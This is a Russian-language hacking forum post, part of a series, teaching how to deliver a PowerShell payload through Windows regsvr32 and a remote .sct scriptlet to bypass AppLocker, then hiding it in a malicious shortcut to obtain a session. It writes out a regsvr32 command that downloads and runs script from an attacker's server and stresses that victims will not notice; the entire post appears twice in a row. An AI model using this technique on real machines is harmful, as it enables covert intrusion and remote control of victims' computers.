<~DarkNode~>
22.01.2017, 11:32
Часть 6Предыдущая часть (https://forum.antichat.xyz/threads/558842/)
Следующая часть
Все части
Доброго времени суток колеги. Сегодня продолжим c вами применять различные техники доставки полезной нагрузки c применением powershell и встроенной утилиты Windows RegSVR.
Техника такой доставки полезной нагрузки очень похожа на технику Web Delivery (https://forum.antichat.xyz/threads/558787/) .
Ну сразу же хотелось бы сказать, что данная техника применяется в большинстве случаев для обхода
AppLocker, но его наличия совсем не обязательно.В конце статьи я попытаюсь продемонстрировать как можно эту технику применять для инжекта в ярлыки. И так ,давайте приступим)
Сперва давайте посмотрим как работает уже готовый експлойт в метаслоте
https://forum.antichat.xyz/attachments/4771805/1.png
Как видим из описания - этот експлойт поднимает на стороне атакуещего простенький веб сервер где создается вредоносный .sct файл в котором находится команда для подгрузки вредоносного скрипта на powershell,который так же размещен на этом веб сервере.
Давайте зададим ему необходимые опции и запустим:
https://forum.antichat.xyz/attachments/4771805/2.png
Как видим эксплоит выдал нам команду ,которую нужно запустить на стороне жертвы.
Код:
regsvr32 /s /n /u /i:http://192.168.0.107:8080/.sct scrobj.dll
Давайте проверим:
https://forum.antichat.xyz/attachments/4771805/3.png
https://forum.antichat.xyz/attachments/4771805/4.png
Как видим все очень легко и просто. Давайте посмотрим как это все работает:
Сперва посмотрим на соcданый файл .sct
https://forum.antichat.xyz/attachments/4771805/5.png
Как видим это обычный XML файл который обработается библиотекой scrobj.dll ( Script Component Runtime) при скачивании .
Regsvr32 является частью ОС и может использоваться для регистрации или отмены регистрации файлов COM скриптов в реестре Windows
Но если разобрать команду по подробнее:
/s (silent) скрытая запуск, не использовать не каких сообщений на вывод.
/n -- говорит о том что не нужно использовать DllRegisterServer
/u -- отмена регистрации
/i -- отвечает за ссылку и DLLinstall
Наша XML представляет из себя VS или JS скрипт между тегами
Сам шаблон для выполнения команды выглядит так:
В этом простом примере запускается просто cmd.exe:
А в нашем примере метасплоит создал XML , где вместо cmd.exe запускается команда на павершел от веб деливери.
Malicous XML сказал(а):
Со своим пейлоадом выглядит примерно так:
https://forum.antichat.xyz/attachments/4771805/8.png
https://forum.antichat.xyz/attachments/4771805/7.png
Думаю , что вполне легко ,по принципу прошлой моей статьи,написать генератор таких XML и закинуть такую XML где то на гитхаб или pastebin.
Какая одна из главных преимуществ этой техники ???
Мне удалось заметить - что при выполнении данной команды,жертва не видит кратковременного мелькания окна командной строки( как при обычном запуске команды для павершел).Следственно если где то прописать эту строчку в автозагрузку или куда то заинжектить - то врят ли жертва что то сможет заметить.)
Давайте я продемонстрирую как лекго можно создать вредоносный ярлык с использованием этой техники.
Сперва создадим полезную нагрузку (https://forum.antichat.xyz/threads/558583/):
https://forum.antichat.xyz/attachments/4771805/9.png
Простенький генератор XML файлов
https://forum.antichat.xyz/attachments/4771805/11.png
https://forum.antichat.xyz/attachments/4771805/10.png
Закинем где то на гитхаб и проверим работоспособность...
https://forum.antichat.xyz/attachments/4771805/12.png
https://forum.antichat.xyz/attachments/4771805/14.png
https://forum.antichat.xyz/attachments/4771805/15.png
Теперь давайте создадим вредоносный ярлык с помошью PowerShell (https://forum.antichat.xyz/threads/558495/):
https://forum.antichat.xyz/attachments/4771805/16.png
Проверяем, запускаем ярлык и получаем сессию
https://forum.antichat.xyz/attachments/4771805/17.png
Всем спасибо за внимание)
Предыдущая часть (https://forum.antichat.xyz/threads/558842/)
Следующая часть
Все части
Следующая часть
Все части
Доброго времени суток колеги. Сегодня продолжим c вами применять различные техники доставки полезной нагрузки c применением powershell и встроенной утилиты Windows RegSVR.
Техника такой доставки полезной нагрузки очень похожа на технику Web Delivery (https://forum.antichat.xyz/threads/558787/) .
Ну сразу же хотелось бы сказать, что данная техника применяется в большинстве случаев для обхода
AppLocker, но его наличия совсем не обязательно.В конце статьи я попытаюсь продемонстрировать как можно эту технику применять для инжекта в ярлыки. И так ,давайте приступим)
Сперва давайте посмотрим как работает уже готовый експлойт в метаслоте
https://forum.antichat.xyz/attachments/4771805/1.png
Как видим из описания - этот експлойт поднимает на стороне атакуещего простенький веб сервер где создается вредоносный .sct файл в котором находится команда для подгрузки вредоносного скрипта на powershell,который так же размещен на этом веб сервере.
Давайте зададим ему необходимые опции и запустим:
https://forum.antichat.xyz/attachments/4771805/2.png
Как видим эксплоит выдал нам команду ,которую нужно запустить на стороне жертвы.
Код:
regsvr32 /s /n /u /i:http://192.168.0.107:8080/.sct scrobj.dll
Давайте проверим:
https://forum.antichat.xyz/attachments/4771805/3.png
https://forum.antichat.xyz/attachments/4771805/4.png
Как видим все очень легко и просто. Давайте посмотрим как это все работает:
Сперва посмотрим на соcданый файл .sct
https://forum.antichat.xyz/attachments/4771805/5.png
Как видим это обычный XML файл который обработается библиотекой scrobj.dll ( Script Component Runtime) при скачивании .
Regsvr32 является частью ОС и может использоваться для регистрации или отмены регистрации файлов COM скриптов в реестре Windows
Но если разобрать команду по подробнее:
/s (silent) скрытая запуск, не использовать не каких сообщений на вывод.
/n -- говорит о том что не нужно использовать DllRegisterServer
/u -- отмена регистрации
/i -- отвечает за ссылку и DLLinstall
Наша XML представляет из себя VS или JS скрипт между тегами
Сам шаблон для выполнения команды выглядит так:
В этом простом примере запускается просто cmd.exe:
А в нашем примере метасплоит создал XML , где вместо cmd.exe запускается команда на павершел от веб деливери.
Malicous XML сказал(а):
Со своим пейлоадом выглядит примерно так:
https://forum.antichat.xyz/attachments/4771805/8.png
https://forum.antichat.xyz/attachments/4771805/7.png
Думаю , что вполне легко ,по принципу прошлой моей статьи,написать генератор таких XML и закинуть такую XML где то на гитхаб или pastebin.
Какая одна из главных преимуществ этой техники ???
Мне удалось заметить - что при выполнении данной команды,жертва не видит кратковременного мелькания окна командной строки( как при обычном запуске команды для павершел).Следственно если где то прописать эту строчку в автозагрузку или куда то заинжектить - то врят ли жертва что то сможет заметить.)
Давайте я продемонстрирую как лекго можно создать вредоносный ярлык с использованием этой техники.
Сперва создадим полезную нагрузку (https://forum.antichat.xyz/threads/558583/):
https://forum.antichat.xyz/attachments/4771805/9.png
Простенький генератор XML файлов
https://forum.antichat.xyz/attachments/4771805/11.png
https://forum.antichat.xyz/attachments/4771805/10.png
Закинем где то на гитхаб и проверим работоспособность...
https://forum.antichat.xyz/attachments/4771805/12.png
https://forum.antichat.xyz/attachments/4771805/14.png
https://forum.antichat.xyz/attachments/4771805/15.png
Теперь давайте создадим вредоносный ярлык с помошью PowerShell (https://forum.antichat.xyz/threads/558495/):
https://forum.antichat.xyz/attachments/4771805/16.png
Проверяем, запускаем ярлык и получаем сессию
https://forum.antichat.xyz/attachments/4771805/17.png
Всем спасибо за внимание)
Предыдущая часть (https://forum.antichat.xyz/threads/558842/)
Следующая часть
Все части